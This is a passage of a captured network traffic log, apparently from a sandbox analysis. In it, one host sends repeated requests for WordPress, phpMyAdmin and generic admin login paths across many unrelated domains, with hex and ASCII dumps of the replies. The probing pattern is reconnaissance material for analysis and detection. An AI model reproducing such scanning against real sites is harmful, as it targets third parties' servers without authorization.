2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	61801	216.37.42.12	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	170	OUT	GET /admin/ HTTP/1.1 Host: www.noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	213	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 34 20 44 65 63 20 32 30 30 38 20 31 31 3a 31 30 3a 32 38 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTServer: ApacheLast-Modified: Sun, 14 Dec 2008 11:10:28 GMTAccept-Ranges: bytesContent-Length: 1997Connection: closeContent-Type: text/html
2023-11-30 10:22:41 UTC	1997	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 45 43 4f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 20 34 30 30 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="Generator" content="NOWECO"><meta name="description" content="Error 400"><title>Error 404</title><li

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	61775	213.171.212.244	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	165	OUT	GET /wp-admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:41 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	61844	3.33.224.147	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	156	OUT	GET / HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:41 UTC	409	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 62 37 30 37 62 30 63 37 34 37 61 62 32 63 33 66 62 33 39 63 66 37 35 61 61 36 39 31 62 30 30 Data Ascii: HTTP/1.1 200 OKServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=300, privateDate: Thu, 30 Nov 2023 10:22:41 GMTETag: "0b707b0c747ab2c3fb39cf75aa691b00
2023-11-30 10:22:41 UTC	15975	IN	Data Raw: 31 66 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 70 61 72 6b 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 1f18<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta property="environment" content="parking"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-widt
2023-11-30 10:22:41 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 69 6e 71 75 69 72 79 5f 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 77 2d 6d 69 6e 20 77 68 69 74 65 73 70 61 63 65 2d 6e 6f 77 72 61 70 20 74 65 78 74 2d 5b 31 35 70 78 5d 20 6c 65 61 64 69 6e 67 2d 5b 31 38 70 78 5d 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 74 65 78 74 2d 67 72 61 79 2d 37 0d 0a 32 30 30 30 0d 0a 30 30 20 21 74 65 78 74 2d 5b 31 34 70 78 5d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 26 6e 62 73 70 Data Ascii: <div class="flex flex-col"> <label for="inquiry_email" class="w-min whitespace-nowrap text-[15px] leading-[18px] font-semibold text-gray-7200000 !text-[14px]"> Email&nbsp
2023-11-30 10:22:41 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 54 22 20 3e 4c 54 20 2d 20 4c 69 74 68 75 61 6e 69 61 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4c 55 22 20 3e 4c 55 20 2d 20 4c 75 78 65 6d 62 6f 75 72 67 3c 2f 6f 70 0d 0a 31 30 30 30 0d 0a 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <option value="LT" >LT - Lithuania</option> <option value="LU" >LU - Luxembourg</op1000tion>
2023-11-30 10:22:41 UTC	7924	IN	Data Raw: 6e 65 20 66 6f 63 75 73 3a 72 69 6e 67 2d 32 20 66 6f 63 75 73 3a 72 69 6e 67 2d 70 72 69 6d 61 72 79 2d 6c 69 67 68 74 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 20 66 6f 63 75 73 3a 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 64 69 73 61 62 6c 65 64 3a 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 20 64 69 73 61 62 6c 65 64 3a 62 67 2d 67 72 61 79 2d 31 30 30 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 20 72 6f 75 6e 64 65 64 2d 6d 64 20 73 68 61 64 6f 77 2d 73 6d 20 68 6f 76 65 72 3a 73 68 61 64 6f 77 20 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 3a 73 68 61 64 6f 77 2d 73 6d 20 21 68 2d 5b 33 36 70 78 5d 20 66 6f 63 75 73 3a 21 72 69 6e 67 2d 62 6c 75 65 2d 32 30 30 20 66 6f 63 75 73 3a 21 62 6f 72 Data Ascii: ne focus:ring-2 focus:ring-primary-light focus:border focus:border-primary disabled:cursor-not-allowed disabled:bg-gray-100 disabled:hover:border-gray-300 rounded-md shadow-sm hover:shadow disabled:hover:shadow-sm !h-[36px] focus:!ring-blue-200 focus:!bor

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	61862	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	317	OUT	GET /wp-admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://1.tv/wp-login.php
2023-11-30 10:22:41 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	61863	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	274	OUT	GET /wp-admin/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://96l.com/wp-login.php
2023-11-30 10:22:41 UTC	717	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	61869	15.197.172.60	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	317	OUT	GET /wp-admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://1.tv/wp-login.php
2023-11-30 10:22:41 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:41 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:41 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	62472	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:41 UTC	171	OUT	GET /wp-login.php HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	249	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:41 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
2023-11-30 10:22:42 UTC	27	IN	Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	63839	104.238.144.219	443

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:42 UTC	170	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:42 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:42 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
